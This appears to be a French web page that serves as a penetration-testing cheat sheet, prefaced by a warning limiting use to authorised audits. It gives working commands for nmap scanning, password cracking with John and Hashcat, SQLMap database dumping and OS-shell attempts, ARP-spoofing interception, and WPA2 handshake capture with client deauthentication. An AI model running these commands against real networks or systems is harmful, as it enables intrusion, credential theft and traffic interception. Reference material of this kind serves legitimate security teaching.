Outils de Sécurité Essentiels
La boĂźte Ă outils du hackerâoutils essentiels pour les tests de pĂ©nĂ©tration et l'audit de sĂ©curitĂ©.
Avertissement Légal
Ces outils sont pour usage éducatif ou audits de sécurité autorisés UNIQUEMENT.
Les utiliser sur des réseaux, systÚmes ou applications que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation écrite explicite est illégal et peut entraßner des poursuites pénales.
Obtenez toujours une autorisation écrite avant de tester.
Catégorie 1 : Reconnaissance Réseau
Nmap â "Le Mappeur"
Le scanner réseau standard de l'industrie. Découvre les hÎtes, ports ouverts, services et versions d'OS.
# Scan basique
nmap 192.168.1.1
# Détection de version de service
nmap -sV 192.168.1.1
# Détection OS + scripts + version
nmap -A 192.168.1.1
# Scan complet des ports TCP
nmap -p- 192.168.1.1
# Scan SYN furtif (nécessite root)
sudo nmap -sS 192.168.1.1
# Scan UDP (lent mais important)
sudo nmap -sU --top-ports 100 192.168.1.1
# Scanner un sous-réseau entier
nmap 192.168.1.0/24
# Sortie vers tous les formats
nmap -oA scan_results 192.168.1.1
Scripts Courants (NSE) :
# Scan de vulnérabilités
nmap --script vuln 192.168.1.1
# ĂnumĂ©ration SMB
nmap --script smb-enum-shares 192.168.1.1
# ĂnumĂ©ration HTTP
nmap --script http-enum 192.168.1.1
| Flag | Objectif |
|---|---|
-sS |
Scan furtif SYN |
-sV |
Détection de version |
-sC |
Scripts par défaut |
-O |
Détection OS |
-A |
Agressif (OS + version + scripts + traceroute) |
-p- |
Tous les 65535 ports |
-Pn |
Ignorer la découverte d'hÎte (supposer en ligne) |
-T4 |
Timing plus rapide |
Wireshark â "Le Microscope"
Inspection et analyse approfondie des paquets. Voir exactement ce qui passe sur le cĂąble.
Cas d'Usage :
- Analyser le trafic réseau suspect
- Déboguer les protocoles d'application
- Capturer les identifiants sur protocoles non chiffrés
- Investiguer la communication de malware
Filtres Courants :
# Filtrer par IP
ip.addr == 192.168.1.100
# Filtrer par protocole
http
dns
tcp.port == 443
# Filtrer les requĂȘtes HTTP
http.request.method == "POST"
# Trouver des mots de passe (non chiffrés)
http contains "password"
# ProblĂšmes de handshake TCP
tcp.flags.syn == 1 && tcp.flags.ack == 0
# Suivre le flux TCP
Clic droit sur paquet â Follow â TCP Stream
Capture Rapide :
# Capture CLI avec tshark
tshark -i eth0 -w capture.pcap
# Capturer un port spécifique
tshark -i eth0 -f "port 80" -w http_traffic.pcap
Catégorie 2 : Cassage de Mots de Passe (Offline)
Comprendre : Hachage vs Chiffrement
| Concept | Hachage | Chiffrement |
|---|---|---|
| Direction | Sens unique (irréversible) | Bidirectionnel (réversible) |
| Objectif | Vérifier l'intégrité | Protéger la confidentialité |
| Clé requise | Non | Oui |
| Exemple | SHA256, bcrypt, MD5 | AES, RSA, ChaCha20 |
Cassage de mot de passe = Ătant donnĂ© un hash, trouver le mot de passe original en essayant des millions de possibilitĂ©s.
John the Ripper
Casseur de mots de passe rapide et polyvalent supportant plus de 100 formats de hash.
# Identifier le type de hash
john --list=formats | grep -i sha
# Casser avec wordlist
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
# Casser avec rĂšgles (mutations)
john --wordlist=rockyou.txt --rules=best64 hashes.txt
# Afficher les mots de passe cassés
john --show hashes.txt
# Format spécifique
john --format=raw-sha256 hashes.txt
Formats supportés :
- Linux shadow (
/etc/shadow) - Windows NTLM
- Mots de passe ZIP/RAR
- Documents Office
- Clés SSH
- Et bien d'autres...
Hashcat â Cassage AccĂ©lĂ©rĂ© par GPU
Plus rapide que John en utilisant la puissance du GPU. Essentiel pour le cassage à grande échelle.
# Attaque par dictionnaire basique
hashcat -m 0 -a 0 hash.txt rockyou.txt
# Avec rĂšgles
hashcat -m 0 -a 0 hash.txt rockyou.txt -r best64.rule
# Brute-force (attaque par masque)
hashcat -m 0 -a 3 hash.txt ?a?a?a?a?a?a
# Afficher les résultats
hashcat --show hash.txt
Modes de Hash Courants (-m) :
| Mode | Type de Hash |
|---|---|
| 0 | MD5 |
| 100 | SHA1 |
| 1400 | SHA256 |
| 1000 | NTLM (Windows) |
| 1800 | SHA512crypt (Linux) |
| 3200 | bcrypt |
| 13100 | Kerberos TGS |
CaractĂšres de Masque :
| Masque | CaractĂšres |
|---|---|
?l |
Minuscules (a-z) |
?u |
Majuscules (A-Z) |
?d |
Chiffres (0-9) |
?s |
CaractÚres spéciaux |
?a |
Tous imprimables |
Catégorie 3 : Web & Base de Données
SQLMap â Automatisation d'Injection SQL
Automatise la détection et l'exploitation des vulnérabilités d'injection SQL.
TrĂšs Bruyant
SQLMap gĂ©nĂšre des centaines de requĂȘtes. Ne jamais utiliser sur des systĂšmes de production sans autorisation. Il dĂ©clenchera toutes les alarmes WAF et IDS.
# Test basique
sqlmap -u "http://target.com/page?id=1"
# RequĂȘte POST
sqlmap -u "http://target.com/login" --data="user=admin&pass=test"
# Avec cookie/session
sqlmap -u "http://target.com/page?id=1" --cookie="PHPSESSID=abc123"
# Dumper la base de données
sqlmap -u "http://target.com/page?id=1" --dump
# Obtenir un shell (si possible)
sqlmap -u "http://target.com/page?id=1" --os-shell
# Spécifier le type de base de données
sqlmap -u "http://target.com/page?id=1" --dbms=mysql
Flags Utiles :
| Flag | Objectif |
|---|---|
--dbs |
Lister les bases de données |
--tables |
Lister les tables |
--columns |
Lister les colonnes |
--dump |
Dumper les données |
--level=5 |
Niveau de test maximum |
--risk=3 |
Risque maximum (plus de tests) |
--batch |
Mode non-interactif |
Catégorie 4 : Man-in-the-Middle (MitM)
Ettercap â ARP Spoofing
Intercepter le trafic sur un LAN en empoisonnant les tables ARP.
Comment fonctionne l'ARP Spoofing :
Normal :
Victime â Switch â Passerelle â Internet
AprĂšs Empoisonnement ARP :
Victime â Switch â [Attaquant] â Passerelle â Internet
â
L'attaquant dit Ă la victime :
"Je suis la passerelle"
# Mode GUI
sudo ettercap -G
# Mode texte - Empoisonnement ARP sur tout le sous-réseau
sudo ettercap -T -q -i eth0 -M arp:remote //192.168.1.1// //192.168.1.0/24//
# Cibler un hÎte spécifique
sudo ettercap -T -q -i eth0 -M arp:remote /192.168.1.1// /192.168.1.100//
Alternative : arpspoof + mitmproxy
# Activer le forwarding IP
echo 1 > /proc/sys/net/ipv4/ip_forward
# ARP spoof dans les deux directions
arpspoof -i eth0 -t 192.168.1.100 192.168.1.1 &
arpspoof -i eth0 -t 192.168.1.1 192.168.1.100 &
# Intercepter avec mitmproxy
mitmproxy --mode transparent
Détection
L'ARP spoofing est facilement détecté par :
- Entrées ARP statiques
- Outils de monitoring ARP (arpwatch)
- Switches d'entreprise avec DAI (Dynamic ARP Inspection)
Catégorie 5 : Audit Sans Fil
Suite Aircrack-ng
Toolkit complet pour l'évaluation de sécurité WiFi.
Composants :
| Outil | Objectif |
|---|---|
airmon-ng |
Activer le mode monitor |
airodump-ng |
Capturer les paquets, trouver les réseaux |
aireplay-ng |
Injecter des paquets, deauth clients |
aircrack-ng |
Casser les handshakes capturés |
Workflow de Cassage WPA2 :
# 1. Activer le mode monitor
sudo airmon-ng start wlan0
# 2. Scanner les réseaux
sudo airodump-ng wlan0mon
# 3. Cibler un réseau spécifique (capturer le handshake)
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
# 4. Deauth client pour forcer la reconnexion (dans un nouveau terminal)
sudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon
# 5. Attendre le message "WPA handshake" dans airodump
# 6. Casser avec wordlist
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
# 7. Désactiver le mode monitor quand terminé
sudo airmon-ng stop wlan0mon
Cassage Plus Rapide
Convertir la capture au format hashcat pour l'accélération GPU :
Catégorie 6 : Rétro-Ingénierie
Ghidra â Le DĂ©sassembleur de la NSA
Outil gratuit et open-source de rétro-ingénierie. Transforme les binaires compilés en pseudo-code lisible.
Fonctionnalités :
- DĂ©sassemblage (binaire â assembleur)
- DĂ©compilation (binaire â pseudo-code C-like)
- Références croisées
- Graphes de fonctions
- Scripting (Python/Java)
Installation :
# Télécharger depuis https://ghidra-sre.org/ (recommandé)
# Ou via gestionnaire de paquets
sudo apt install ghidra # Kali/Debian/Ubuntu
# Sur RHEL/Rocky : télécharger manuellement depuis le site officiel
# Exécuter
ghidraRun
Workflow :
- Créer un nouveau projet
- Importer le binaire (File â Import)
- Double-cliquer pour ouvrir dans CodeBrowser
- Auto-analyser quand demandé
- Naviguer les fonctions dans le panneau gauche
- Appuyer sur
Fsur les adresses pour créer des fonctions - Renommer variables/fonctions pour plus de clarté
Raccourcis Clavier :
| Touche | Action |
|---|---|
G |
Aller Ă l'adresse |
L |
Renommer/étiqueter |
T |
Retyper une variable |
; |
Ajouter un commentaire |
X |
Afficher les références croisées |
Ctrl+E |
Ăditer les octets |
Tableau de Référence Rapide
| Catégorie | Outil | One-liner |
|---|---|---|
| Scan de Ports | Nmap | nmap -sCV -oA scan target |
| Analyse de Paquets | Wireshark | GUI ou tshark -i eth0 |
| Cassage de Hash | John | john --wordlist=rockyou.txt hash.txt |
| Cassage de Hash (GPU) | Hashcat | hashcat -m 0 -a 0 hash.txt rockyou.txt |
| Injection SQL | SQLMap | sqlmap -u "url?id=1" --dump |
| ARP Spoofing | Ettercap | ettercap -T -M arp:remote /// |
| Audit WiFi | Aircrack-ng | aircrack-ng -w wordlist capture.cap |
| Rétro-Ingénierie | Ghidra | Analyse basée sur GUI |